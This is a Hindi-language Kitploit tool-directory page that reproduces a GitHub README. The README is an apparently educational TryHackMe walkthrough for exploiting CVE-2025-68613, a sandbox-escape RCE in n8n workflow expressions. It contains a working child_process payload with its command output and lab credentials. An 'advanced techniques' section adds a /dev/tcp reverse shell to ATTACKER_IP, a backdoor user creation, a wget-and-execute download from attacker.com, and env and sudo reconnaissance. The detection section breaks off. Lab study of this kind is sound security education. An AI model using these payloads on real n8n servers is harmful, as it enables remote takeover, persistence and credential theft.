Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
n8n-cve-2025-68613-thm — CVE-2025-68613 के शोषण के लिए शैक्षिक वॉकथ्रू, जो n8n वर्कफ़्लो ऑटोमेशन में एक महत्वपूर्ण RCE है। इसमें एक्सप्रेशन इंजेक्शन, सैंडबॉक्स एस्केप, पेलोड डेवलपमेंट और TryHackMe लैब के माध्यम से डिटेक्शन रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/khin-96/n8n-cve-2025-68613-thm
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षाघटना प्रतिक्रियापेलोड डेवलपमेंटलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubkhin-96/n8n-cve-2025-68613-thm

n8n-cve-2025-68613-thm

CVE-2025-68613 के शोषण के लिए शैक्षिक वॉकथ्रू, जो n8n वर्कफ़्लो ऑटोमेशन में एक महत्वपूर्ण RCE है। इसमें एक्सप्रेशन इंजेक्शन, सैंडबॉक्स एस्केप, पेलोड डेवलपमेंट और TryHackMe लैब के माध्यम से डिटेक्शन रणनीतियाँ शामिल हैं।

रिपॉजिटरी देखें
1119 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-68613 – n8n महत्वपूर्ण RCE शोषण

अवलोकन

यह रिपॉजिटरी CVE-2025-68613 (CVSS 9.9) के हाथों-हाथ शोषण का दस्तावेज़ीकरण करती है, जो n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म (संस्करण 0.211.0 से 1.120.3) को प्रभावित करने वाली एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता है।

यह शोषण नैतिक रूप से एक नियंत्रित TryHackMe प्रयोगशाला वातावरण में केवल शैक्षिक उद्देश्यों के लिए किया गया था।


भेद्यता सारांश

फ़ील्डमान
CVE IDCVE-2025-68613
CVSS स्कोर9.9 (गंभीर)
प्रकाशित19 दिसंबर, 2025
प्रभावित उत्पादn8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म
भेद्यता प्रकारएक्सप्रेशन इंजेक्शन → सैंडबॉक्स एस्केप → RCE
हमला वेक्टरप्रमाणित उपयोगकर्ता (डिफ़ॉल्ट)
पैच किए गए संस्करण1.120.4, 1.121.1, 1.122.0+
प्रभावित संस्करण0.211.0 - 1.120.3

n8n क्या है?

n8n एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को कार्य स्वचालन के लिए अनुप्रयोगों और सेवाओं को दृश्य रूप से जोड़ने की अनुमति देता है। इसमें निम्नलिखित विशेषताएं शामिल हैं:

  • नोड-आधारित वर्कफ़्लो आर्किटेक्चर: प्रत्येक नोड एक क्रिया का प्रतिनिधित्व करता है (API अनुरोध, डेटा प्रोसेसिंग, ईमेल, आदि)
  • 400+ मूल एकीकरण: विभिन्न APIs और सेवाओं के लिए पूर्व-निर्मित कनेक्टर
  • कोड नोड्स: कस्टम जावास्क्रिप्ट या पायथन कोड निष्पादन
  • एक्सप्रेशन मूल्यांकन: {{ }} में लिपटे गतिशील एक्सप्रेशन जावास्क्रिप्ट के रूप में मूल्यांकित होते हैं

तैनाती मॉडल

  • स्वयं-होस्टेड इंस्टेंस (ऑन-प्रिमाइसेस या प्राइवेट क्लाउड)
  • क्लाउड-होस्टेड (n8n.cloud) प्रबंधित सेवा
  • कॉर्पोरेट नेटवर्क के भीतर आंतरिक ऑटोमेशन टूल

तकनीकी पृष्ठभूमि

भेद्यता श्रृंखला

भेद्यता n8n के वर्कफ़्लो एक्सप्रेशन मूल्यांकन प्रणाली में निहित है। जब प्रमाणित उपयोगकर्ता वर्कफ़्लो कॉन्फ़िगर करते हैं, तो उनका इनपुट पर्याप्त सैंडबॉक्सिंग के बिना जावास्क्रिप्ट कोड के रूप में संसाधित होता है।

संदर्भ वृद्धि श्रृंखला

Expression Sandbox
    ↓ ('this' के माध्यम से भागना)
Node.js Global Context
    ↓ (mainModule तक पहुंच)
Module System (require)
    ↓ (child_process लोड करना)
System Command Execution

प्रमुख खामियां

  1. असुरक्षित एक्सप्रेशन मूल्यांकन: {{ }} में लिपटे उपयोगकर्ता एक्सप्रेशन बिना उचित संदर्भ अलगाव के कच्चे जावास्क्रिप्ट के रूप में मूल्यांकित होते हैं
  2. सैंडबॉक्स एस्केप: this ऑब्जेक्ट तक पहुंच इच्छित सैंडबॉक्स प्रतिबंधों से भागने की अनुमति देती है
  3. अप्रतिबंधित मॉड्यूल पहुंच: process.mainModule.require() Node.js मॉड्यूल सिस्टम तक पहुंच प्रदान करता है
  4. खतरनाक मॉड्यूल लोडिंग: सिस्टम कमांड निष्पादन के लिए child_process मॉड्यूल लोड कर सकता है
  5. कोई सार्थक प्रमाणीकरण सुरक्षा नहीं: कोई भी प्रमाणित उपयोगकर्ता भेद्यता का शोषण कर सकता है

शोषण पेलोड विवरण

(function(){ 
  return this.process.mainModule.require('child_process').execSync('COMMAND').toString() 
})()

व्याख्या:

  • this → Node.js वैश्विक ऑब्जेक्ट
  • this.process → Node.js प्रक्रिया ऑब्जेक्ट
  • process.mainModule → n8n एप्लिकेशन का रूट मॉड्यूल
  • .require('child_process') → सिस्टम कमांड निष्पादन मॉड्यूल लोड करें
  • .execSync('COMMAND') → शेल कमांड को समकालिक रूप से निष्पादित करें
  • .toString() → Buffer आउटपुट को पठनीय स्ट्रिंग में बदलें

शोषण वॉकथ्रू

चरण 1: प्रमाणीकरण

कमजोर n8n इंस्टेंस तक पहुंचें और मान्य क्रेडेंशियल्स के साथ लॉगिन करें।

प्रयोगशाला क्रेडेंशियल्स:

  • ईमेल: [email protected]
  • पासवर्ड: Try12345!

Login Screen


चरण 2: स्वागत और वर्कफ़्लो निर्माण

लॉगिन के बाद, आपको वर्कफ़्लो निर्माण इंटरफ़ेस प्रस्तुत किया जाता है। एक नया वर्कफ़्लो शुरू करने के लिए "Start from scratch" पर क्लिक करें।

Welcome Screen


चरण 3: मैनुअल ट्रिगर जोड़ें

"Add first step" पर क्लिक करें और "Manual Trigger" खोजें। यह नोड वर्कफ़्लो निष्पादन के लिए प्रवेश बिंदु के रूप में कार्य करता है।

Manual Trigger Setup

उद्देश्य: मैनुअल ट्रिगर नोड UI में "Execute workflow" बटन के माध्यम से वर्कफ़्लो के मैन्युअल निष्पादन की अनुमति देता है, जो परीक्षण के लिए आदर्श है।


चरण 4: वर्कफ़्लो कॉन्फ़िगर करें और फ़ील्ड मैपिंग जोड़ें

फ़ील्ड मैपिंग करने के लिए एक "Edit Fields" नोड जोड़ें। यहीं पर भेद्यता का शोषण किया जाता है।

Workflow Configuration

कॉन्फ़िगरेशन चरण:

  1. एक नई फ़ील्ड मैपिंग जोड़ने के लिए "Add field" पर क्लिक करें
  2. मोड को "Expression" पर सेट करें
  3. यह जावास्क्रिप्ट कोड मूल्यांकन की अनुमति देता है

चरण 5: ID कमांड निष्पादित करें

id कमांड को निष्पादित करने और उपयोगकर्ता/विशेषाधिकार जानकारी प्राप्त करने के लिए पेलोड इंजेक्ट करें।

पेलोड:

(function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })()

परिणाम:

uid=1000(node) gid=1000(node) groups=1000(node)

ID Command Execution

प्राप्त जानकारी:

  • गैर-रूट उपयोगकर्ता के रूप में चल रहा है (uid=1000)
  • समूह सदस्यता (gid=1000)
  • संभावित विशेषाधिकार वृद्धि मार्ग

चरण 6: LS के साथ फ़ाइल सिस्टम की गणना करें

ls कमांड निष्पादित करने और निर्देशिका सामग्री को सूचीबद्ध करने के लिए पेलोड संशोधित करें।

पेलोड:

(function(){ return this.process.mainModule.require('child_process').execSync('ls -la').toString() })()

LS Command Execution

आउटपुट दिखाता है:

  • फ़्लैग फ़ाइल मौजूद: flag.txt
  • निर्देशिका संरचना और फ़ाइल अनुमतियाँ
  • अतिरिक्त टोही डेटा

चरण 7: संवेदनशील डेटा निकालें

शोषण पूरा करने के लिए cat कमांड का उपयोग करके फ़्लैग फ़ाइल पढ़ें।

पेलोड:

(function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })()

फ़्लैग प्राप्त:

THM{n8n_exposed_workflow}

Flag Extraction


उन्नत शोषण तकनीकें

1. रिवर्स शेल

नियंत्रण के लिए इंटरैक्टिव शेल पहुंच स्थापित करें:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1').toString() 
})()

2. बैकडोर उपयोगकर्ता बनाएं

निरंतर पहुंच के लिए एक नया सिस्टम उपयोगकर्ता जोड़ें:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('useradd -m -p $(openssl passwd -1 PASSWORD) backdoor').toString() 
})()

3. दुर्भावनापूर्ण पेलोड डाउनलोड करें

दूरस्थ कोड लाएं और निष्पादित करें:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('wget http://attacker.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh').toString() 
})()

4. विशेषाधिकार वृद्धि गणना

sudo विशेषाधिकारों की जांच करें:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('sudo -l').toString() 
})()

5. पर्यावरण टोही

पर्यावरण चर निकालें:

(function(){ 
  return this.process.mainModule.require('child_process').execSync('env').toString() 
})()

पहचान रणनीतियाँ

वेब प्रॉक्सी लॉगिंग (Nginx)

विश्लेषण के लिए अपने प्रॉक्सी को अनुरोध निकायों को लॉग करने के लिए कॉन्फ़िगर करें:

टूल डाउनलोड करें